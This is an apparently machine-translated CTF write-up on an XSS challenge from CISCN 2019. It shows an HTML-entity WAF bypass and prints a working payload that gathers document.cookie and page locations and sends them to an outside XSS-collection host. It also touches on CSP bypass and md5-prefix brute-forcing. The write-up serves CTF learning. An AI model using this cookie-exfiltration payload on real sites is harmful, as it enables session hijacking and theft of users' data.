Recurring topic [CISCN 2019 China Northeast Division Web2 WriteUp] (https://www.zhaoj.in/read-6100.html) of something

Had never done before xss title, this title by writeup do feel it something that record about it

1. waf of xss bypass

   () Are filtered, all the payload into HTML Markup , in fact, add ascii code & #

2. payload

   <svg><script>eval&#40&#34" + output + "&#34&#41</script>

   output is the following things into HTML Markup coding something that is XSS Platform The platform comes with payload, she did not understand, tidy code format

   (function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0
    &location='+escape((function(){try{return document.location.href}catch(e){return''}})())+
    '&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+
    '&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+
    '&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

   Very clear, document.cookie some of the data obtained in this way get request directly to the internet xss

   

   You can try to directly accesshttp://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&cookie=123

   (Id to replace their own projects)

   In the corresponding project will receive the corresponding cookie: 1234

   There comes a lot of payload, can analyze the past has not succeeded, this finally became one, hhh, there is little excitement

3. CSP bypass

   I'm up here two days, did not find out

4. substr(md5($str), 0, 6) === “d05a29”

   Hash collision with the birthday attack

5. There are a lot of feeling did not write! ! ! To be added